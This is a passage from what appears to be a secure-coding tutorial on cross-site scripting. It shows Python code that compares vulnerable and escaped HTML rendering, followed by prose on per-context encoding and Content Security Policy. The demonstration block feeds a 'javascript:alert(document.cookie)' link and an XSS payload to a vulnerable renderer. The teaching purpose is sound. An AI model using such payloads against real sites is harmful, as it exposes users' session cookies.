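    return f'<a href="{safe_href(homepage)}">{html.escape(display_name, quote=True)}</a>'


def contains_script_tag(rendered: str) -> bool:
    """Crude oracle for the demonstration: did a live <script> tag survive?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(XSS_PAYLOAD))
    print(render_search_safe(XSS_PAYLOAD))
    print(render_profile_link("Mallory", "javascript:alert(document.cookie)"))
    print(render_profile_link("Alice", "https://example.org/~alice"))
```

The same escaped value is not safe in every position: what is correct inside text content is wrong inside a script block or an unquoted attribute, so templating engines apply an encoder per context, and a Content Security Policy limits the damage when one is missed.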
